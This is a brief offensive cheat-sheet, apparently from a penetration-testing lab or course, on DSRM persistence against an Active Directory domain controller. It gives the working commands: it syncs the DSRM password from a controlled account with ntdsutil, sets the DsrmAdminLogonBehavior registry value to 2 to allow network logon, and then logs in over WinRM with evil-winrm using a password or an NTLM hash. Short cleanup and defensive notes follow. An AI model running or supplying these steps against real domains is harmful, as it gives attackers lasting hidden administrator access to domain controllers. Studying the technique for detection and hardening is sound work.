DSRM persistence abuses the Directory Services Restore Mode local Administrator account on a domain controller. If network logon is enabled and the DSRM password is known or synced to a controlled account, the DC has a local authentication path separate from normal domain admin membership.
Check DSRM network logon behavior
reg query HKLM\System\CurrentControlSet\Control\Lsa /v DsrmAdminLogonBehavior
Sync DSRM password from a domain account
ntdsutil "set dsrm password" "sync from domain account student" q q
Enable DSRM network logon
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DsrmAdminLogonBehavior /t REG_DWORD /d 2 /f
Use the local Administrator path
evil-winrm -i 10.10.10.200 -u Administrator -p 'student'
evil-winrm -i 10.10.10.200 -u Administrator -H LOCAL_ADMIN_NTLM
Disable DSRM network logon
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DsrmAdminLogonBehavior /t REG_DWORD /d 0 /f
Reset DSRM password
ntdsutil "set dsrm password" "reset password on server null" q q
Notes
- DSRM is local to the domain controller.
- This is not the same as domain Administrator.
- The dangerous setting is
DsrmAdminLogonBehavior=2, which permits network logon using the DSRM account.